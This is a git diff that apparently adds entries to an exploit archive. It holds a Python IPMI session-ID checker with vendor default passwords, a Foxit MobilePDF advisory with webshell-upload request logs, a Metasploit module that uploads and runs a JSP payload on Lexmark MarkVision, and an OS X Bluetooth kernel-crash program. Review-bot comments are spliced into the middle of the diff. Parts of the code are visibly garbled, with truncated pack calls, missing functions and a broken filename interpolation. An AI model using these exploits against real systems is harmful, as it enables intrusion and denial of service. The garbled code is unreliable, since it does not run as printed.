diff --git a/files.csv b/files.csv
index 1f45f62d6..c63582c2d 100755
--- a/files.csv
+++ b/files.csv
@@ -32220,3 +32220,13 @@ id,file,description,date,author,platform,type,port
 35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager <= 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0
 35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager <= 8.5 iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0
 35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager <= 8.5 iptm/logicalTopo.do Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0
+35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80
+35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623
+35771,platforms/osx/dos/35771.c,"OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
+35772,platforms/osx/dos/35772.c,"OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
+35773,platforms/osx/dos/35773.c,"OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
+35774,platforms/osx/dos/35774.c,"OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0
+35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888
+35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,metasploit,java,remote,9788
+35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows FILE Privilege Abuse",2015-01-13,metasploit,windows,remote,0
+35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Shell Upload",2015-01-13,metasploit,php,remote,80
diff --git a/platforms/hardware/webapps/35770.py b/platforms/hardware/webapps/35770.py
new file mode 100755
index 000000000..246b1908f
--- /dev/null
+++ b/platforms/hardware/webapps/35770.py
@@ -0,0 +1,430 @@ +""" +For testing purposes only. + +(c) Yong Chuan, Koh 2014 +""" + +from time import sleep +from socket import * +from struct import * +from random import * +import sys, os, argparse + +HOST = None +PORT = 623 + +bufsize = 1024 +recv = "" + + +# create socket +UDPsock = socket(AF_INET,SOCK_DGRAM) +UDPsock.settimeout(2) + +data = 21 #offset of data start + +RMCP = ('\x06' + #RMCP.version = ASF RMCP v1.0 + '\x00' + #RMCP.reserved + '\xFF' + #RMCP.seq + '\x07' #RMCP.Type/Class = Normal_RMCP/IPMI + ) + + + +def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None): + auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5} + + sess_header = '' + sess_header += pack(' 0: + chksum = 0x100 - chksum + + return pack('>B', chksum) + + + def Header (self, cmd, seq_num=0x00): + #only for IPMI v1.5 + cmds = {'Get Channel Auth Capabilities' : (0x06, 0x38), #(netfn, cmd_code) + 'Get Session Challenge' : (0x06, 0x39), + 'Activate Session' : (0x06, 0x3a), + 'Set Session Privilege Level' : (0x06, 0x3b), + 'Close Session' : (0x06, 0x3c), + 'Set User Access' : (0x06, 0x43), + 'Get User Access' : (0x06, 0x44), + 'Set User Name' : (0x06, 0x45), + 'Get User Name' : (0x06, 0x46), + 'Set User Password' : (0x06, 0x47), + 'Get Chassis Status' : (0x00, 0x01)} + ipmi_header = '' + ipmi_header += pack('B', self.auth_types[auth_type]) + ipmi += pack('>B', self.priv_lvls[priv_lvl]) + ipmi += authcode #challenge string + ipmi += pack('B', self.priv_lvls[priv_lvl]) + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + + def CloseSession (self, hdr_seq, sess_id): + ipmi = '' + ipmi += self.Header ("Close Session", hdr_seq) + ipmi += pack('B', chn_num) #chn_num = 0x0E = current channel + ipmi += pack('>B', user_id) + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + + def GetUserName (self, hdr_seq, user_id=2): + ipmi = '' + ipmi += self.Header ("Get User Name", hdr_seq) + ipmi += pack('>B', user_id) + ipmi += self.CheckSum(ipmi[3:]) + + 
return ipmi + + def SetUserName (self, hdr_seq, user_id, user_name): + #Assign user_name to user_id, replaces if user_id is occupied + ipmi = '' + ipmi += self.Header ("Set User Name", hdr_seq) + ipmi += pack('>B', user_id) + ipmi += user_name.ljust(16, '\x00') + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + def SetUserPassword (self, hdr_seq, user_id, password, op='set password'): + ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3} + ipmi = '' + ipmi += self.Header ("Set User Password", hdr_seq) + ipmi += pack('>B', user_id) + ipmi += pack('>B', ops[op]) + ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E): + ipmi = '' + ipmi += self.Header ("Set User Access", hdr_seq) + ipmi += pack('B', user_id) + ipmi += pack('>B', self.priv_lvls[new_priv]) + ipmi += pack('>B', 0) + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + +def SendUDP (pkt): + + global HOST, PORT, data + + res = '' + code = ipmi_seq = 0xFFFF + for i in range(5): + try: + UDPsock.sendto(pkt, (HOST, PORT)) + res = UDPsock.recv(bufsize) + except Exception as e: + print '[-] Socket Timeout: Try %d'%i + sleep (0) + else: + #have received a reply + if res[4:5] == '\x02': #Session->AuthType = MD5 + data += 16 + code = unpack('B',res[data-1:data])[0] + ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2 + if res[4:5] == '\x02': + data -= 16 + break + return code, ipmi_seq, res + + +def SetUpSession (username, pwd, priv='Admin', auth='MD5'): + + global data + + #Get Channel Authentication Capabilities + ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv) + code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) + if code != 0x00: + return code, 0, 0, 0 + #print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq) + + + #Get Session Challenge + ipmi = 
CreateIPMI().GetSessionChallenge(1, username, 'MD5') + code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) + if code != 0x00: + if code == 0xFFFF: + print "[-] BMC didn't respond to IPMI v1.5 session setup" + print " If firmware had disabled it, then BMC is not vulnerable" + return code, 0, 0, 0 + temp_sess_id = unpack('" + ipmi = CreateIPMI().GetChassisStatus(31) + code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi) + print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq) + sess_seq += 1 + + return sess_seq + + + + + +def banner(): + print ("######################################################\n"+\ + "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\ + "## (http://www.kb.cert.org/vuls/id/843044)\n"+\ + "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\ + "## and checking that these values are incremental\n"+\ + "## \n"+\ + "## Author: Yong Chuan, Koh\n"+\ + "## Email: yongchuan.koh@mwrinfosecurity.com\n"+\ + "## (c) Yong Chuan, Koh 2014\n"+\ + "######################################################\n") + + +def main(): + + banner() + + #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi) + vendors = {"HP" :{"user":"Administrator", "pwd":""}, #no default pwd: + "DELL" :{"user":"root", "pwd":"calvin"}, + "IBM" :{"user":"USERID", "pwd":"PASSW0RD"}, + "FUJITSU" :{"user":"admin", "pwd":"admin"}, + "SUPERMICRO" :{"user":"ADMIN", "pwd":"ADMIN"}, + "ORACLE" :{"user":"root", "pwd":"changeme"}, + "ASUS" :{"user":"admin", "pwd":"admin"} + } + + arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values") + arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server") + arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)") + 
arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)") + arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)") + arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)") + + args = arg.parse_args() + + if args.vendor is not None: args.vendor = args.vendor.upper() + if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None): + print "[-] Error: -n and -p are required because -v is not specified/in default list" + print " Vendors with Default Accounts" + print " -----------------------------------" + for vendor,acct in vendors.iteritems(): + print " %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"]) + sys.exit(1) + + if args.username is None: args.username = vendors[args.vendor]["user"].ljust(16, '\x00') + if args.password is None: args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00') + + + global HOST, PORT + HOST = args.ip + PORT = args.udpport + + print "Script Parameters" + print "-------------------------" + print "IP : %s"%HOST + print "Port : %d"%PORT + print "Username : %s"%args.username + print "Password : %s"%args.password + + session_ids = [] + for i in xrange(0x80): #do not go beyond 0xFF, because of how session_ids is checked for incremental later + try: + code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5') + if code == 0: + session_ids.append(temp_sess_id) + session_ids.append(sess_id) + print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id) + else: + #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i) + sleep(5) + continue + + + code = CloseSession (sess_seq, sess_id) + if code == 0: + #print '[+%04X] Close Session OK'%(i) + i += 1 + sleep (0.5) + else: + #print 
'[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i) + sleep(65) + + except Exception as e: + exc_type, exc_obj, exc_tb = sys.exc_info() + fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] + print (exc_type, fname, exc_tb.tb_lineno) + + + session_ids = session_ids[:0xFF] + + #get the first incremental diff + const_diff = None + for i in xrange(1, len(session_ids)): + if session_ids[i-1] < session_ids[i]: + const_diff = session_ids[i] - session_ids[i-1] + break + #check if session_ids are increasing at a fixed value + vulnerable = True + crossed_value_boundary = 0 + for i in xrange(1, len(session_ids)): + + if session_ids[i]-session_ids[i-1] != const_diff: + if crossed_value_boundary < 2: + crossed_value_boundary += 1 + else: + vulnerable = False + + if vulnerable: + print "Conclusion: BMC is vulnerable to CVE-2014-8272" + else: + print "Conclusion: BMC is not vulnerable to CVE-2014-8272" + + + + + + +if __name__ == "__main__": + main() + + diff --git a/platforms/ios/webapps/35775.txt b/platforms/ios/webapps/35775.txt new file mode 100755 index 000000000..d48891f4b --- /dev/null +++ b/platforms/ios/webapps/35775.txt 
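Review bot: The verdict at the end of main() reports "vulnerable" whenever `session_ids` is empty or very short — `vulnerable` starts as True and the two loops over `xrange(1, len(session_ids))` simply never run, so a BMC that never answered (every SetUpSession timing out) is declared vulnerable to CVE-2014-8272. The opposite failure also exists: `const_diff` is only set when an ID is strictly greater than its predecessor, so a BMC that hands out the same session ID every time (the most predictable case of all) leaves `const_diff` as None, every diff compares unequal, `crossed_value_boundary` reaches 2 and the script prints "not vulnerable". I would guard on the sample size and treat a never-increasing series as predictable, leaving the fixed-step check itself as is. Two smaller points: `i += 1` inside `for i in xrange(0x80)` has no effect on the loop, and the vendor defaults are padded to 16 bytes with `ljust` while `-n`/`-p` values are passed unpadded — if GetSessionChallenge packs a fixed-width username field (its body is garbled in this rendering), supplied credentials should be padded the same way.
```python
    session_ids = session_ids[:0xFF]
    if len(session_ids) < 4:
        print "[-] Only %d session ID(s) collected; cannot judge randomness" % len(session_ids)
        sys.exit(2)

    # … unchanged: search for the first positive increment (const_diff) …

    if const_diff is None:
        # IDs never increased: a constant ID is at least as predictable as a fixed step
        const_diff = 0

    # … unchanged: fixed-step check and verdict …
```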
@@ -0,0 +1,274 @@ +Document Title: +=============== +Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1400 + + +Release Date: +============= +2015-01-12 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1400 + + +Common Vulnerability Scoring System: +==================================== +6.9 + + +Product & Service Introduction: +=============================== +Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere. +Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing. +Share, store and synchronize PDF files. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-01-12: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Foxit Corporation +Product: MobilePDF - iOS Web Application (Wifi) 4.4.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. +The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific +path commands to compromise the mobile web-application. 
+ +The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the +wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context +on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script +code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the +wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side +of the affected iOS application. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. +Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components. + +Vulnerable Method(s): + [+] POST + +Vulnerable Module(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename (name) + +Affected Module(s): + [+] Index of Documents (http://localhost:8888) + + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. +The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server. + +The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the +filename with multiple extensions in the upload POST method request. 
The attacker uploads for example a web-shell with the following name and extension +`pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file +extension and can access the webshell with elevated access rights to execute. + +The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. +Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. +Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server. + + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename (multiple extensions) + +Affected Module(s): + [+] Index of Documents (http://localhost:8888) + + +Proof of Concept (PoC): +======================= +1.1 +The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Download and install the FoxIT MobilePDF iOS application +2. Surf to the Documents Index of the Wifi Server (http://localhost:8888) +3. Start to choose a file for the upload function by usage of the search +4. Intercept the session by usage of a tamper and change the name value to the local device path source +5. Continue the request and save the settings. After that go back to the Index of Documents +Note: The execution of the script code occurs in the vulnerable name value of the index file dir list +6. Successful reproduce of the security vulnerability! 
+ +PoC: Index of Documents (Name) +file +2015-01-10 13:49538 B + +--- PoC Session Logs [POST] (File Include > Upload)--- +Status: 200[OK] +POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8888] + User-Agent +[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8888/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------3796507625132 +Content-Disposition: form-data; name="button"; +filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png" +Content-Type: image/png + +--- PoC Session Logs [GET] (File Dir Index List)--- +13:54:26.427[48ms][total 48ms] Status: 200[OK] +GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8888/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[142] + Date[Sa., 10 Jan. 2015 12:49:30 GMT] + +Reference(s): +http://localhost:8888/ +http://localhost:8888/%3C/./ + + + +1.2 +The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. 
+ +PoC: URL +http://localhost:8888/./webshell.png.html.php + +PoC: Index of Documents +webshell.png.html.php.js.png +file2015-01-10 13:58 +538 B + +--- PoC Session Logs [POST] --- +14:03:16.481[149ms][total 1583ms] Status: 200[OK] +POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8888/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------282243582256 +Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png" +Content-Type: image/png + +Reference(s): +http://localhost:8888/ +http://localhost:8888/./webshell.png.html.php + + +Solution - Fix & Patch: +======================= +1.1 +The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request. +Restrict the filename input and filter with an own set exception to prevent application-side attacks. +Parse also in the Index of Documents the vulnerable name output value to solve the issue. + +1.2 +Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions. +Restrict the upload folder and disallow the execution of files that are already uploaded. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability in the upload POSt method request is estimated as high. (CVSS 6.9) + +1.2 +The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. 
(CVSS 6.6) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. 
All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/java/remote/35776.rb b/platforms/java/remote/35776.rb new file mode 100755 index 000000000..fa807db5e --- /dev/null +++ b/platforms/java/remote/35776.rb 
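Review bot: The advisory classifies 1.1 as a "local file include", but the logged requests do not show any local file being included: the POST stores a filename of `./[…]+2.png` and the follow-up GET to `/%3C/./[…]` only shows that the unsanitized name is echoed back in the document index, i.e. missing filename validation (path characters and markup reaching the listing), which a reader should not confuse with LFI. Likewise 1.2 says the renamed `webshell.png.html.php` can be executed "with elevated access rights", yet nothing in the session log shows server-side execution — the response is served as `application/x-unknown-content-type` — so the demonstrated impact is an arbitrary file write into the app's document store, not code execution. The "remote" / "no user interaction" wording also deserves a caveat: if, as the "(Wifi)" label suggests, the transfer service on port 8888 is only up while the user enables it, an attacker must be on the same network at that time. A sentence under Technical Details such as `Impact observed in the PoC: unsanitized filename stored and rendered in the index; no script or file execution was demonstrated` would keep the severity claims in line with the evidence.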
@@ -0,0 +1,155 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1. + A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated + attacker to upload arbitrary files, including arbitrary JSP code. This module has been + tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2. + }, + 'Author' => + [ + 'Andrea Micalizzi', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-8741'], + ['ZDI', '14-410'], + ['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US'] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Lexmark Markvision Enterprise 2.0', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 09 2014')) + + register_options( + [ + Opt::RPORT(9788), + OptString.new('TARGETURI', [true, 'ROOT path', '/']) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html') + }) + + version = nil + if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/ + version = $1 + else + return Exploit::CheckCode::Unknown + end + + if Gem::Version.new(version) <= Gem::Version.new('2.0.0') + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + jsp_leak = jsp_path + jsp_name_leak = 
"#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp" + # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled + # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT + traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" + + print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") + if upload_file(traversal_leak, jsp_leak) + print_good("#{peer} - JSP successfully uploaded") + else + fail_with(Failure::Unknown, "#{peer} - JSP upload failed") + end + + res = execute(jsp_name_leak) + + if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ + upload_path = $1 + print_good("#{peer} - Working directory found in #{upload_path}") + register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) + else + print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") + end + + jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" + jsp_payload = payload.encoded + traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" + + print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") + if upload_file(traversal_payload, jsp_payload) + print_good("#{peer} - JSP successfully uploaded") + register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path + else + fail_with(Failure::Unknown, "#{peer} - JSP upload failed") + end + + print_status("#{peer} - Executing payload...") + execute(jsp_payload_name, 3) + end + + def upload_file(filename, contents) + good_signature = rand_text_alpha(4 + rand(4)) + bad_signature = rand_text_alpha(4 + rand(4)) + + post_data = Rex::MIME::Message.new + post_data.add_part(good_signature, nil, nil, 'form-data; name="success"') + post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"') + post_data.add_part(contents, 
'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#(unknown)\"") + + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'), + 'method' => 'POST', + 'data' => post_data.to_s, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature) + return true + else + return false + end + end + + def execute(jsp_name, time_out = 20) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, jsp_name), + 'method' => 'GET' + }, time_out) + + res + end + + def jsp_path + jsp =<<-EOS +<%@ page language="Java" import="java.util.*"%> +<% +out.println("Path:" + System.getProperty("catalina.home")); +%> + EOS + + jsp + end + +end \ No newline at end of file diff --git a/platforms/osx/dos/35771.c b/platforms/osx/dos/35771.c new file mode 100755 index 000000000..33c1e8cea --- /dev/null +++ b/platforms/osx/dos/35771.c 
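Review bot: `check` flags only `Gem::Version.new(version) <= Gem::Version.new('2.0.0')` while the description says every release before 2.1 is affected, so a 2.0.x build newer than 2.0.0 would be reported Safe; `if Gem::Version.new(version) < Gem::Version.new('2.1.0')` matches the advisory. In `upload_file` the part's disposition reads `filename=\"#(unknown)\"` — that looks like a rendering artifact of `#{filename}`, but as printed the traversal path built in `exploit` is never sent, so verify against the upstream module. The `\x00.pdf` suffix presumably relies on the server's Java runtime truncating the path at the NUL byte, which newer JREs reject; a sentence in the description noting that success depends on the bundled JRE and not only on the MarkVision version would save users a confusing failure.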
@@ -0,0 +1,74 @@ +/* + * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. + * + * Exploits a missing check in + * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic. + * + * gcc -Wall -o crash-issue1{,.c} -framework IOKit + */ + +#include +#include +#include +#include +#include + +#include + +#define SIZE 0x1000 + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +int main(void) { + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + printf(" [+] Opened connection to service on port: %d\n", port); + + struct BluetoothCall a; + int i; + + for (i=0; i<7; i++) { + a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); + a.sizes[i] = SIZE; + } + + /* This value causes IOMalloc() to fail */ + a.args[6] = 0x0; + a.sizes[6] = 0x80000041; + a.index = 0x06; /* DispatchHCICreateConnection() */ + + for(i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + 120, /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/osx/dos/35772.c b/platforms/osx/dos/35772.c new file mode 100755 index 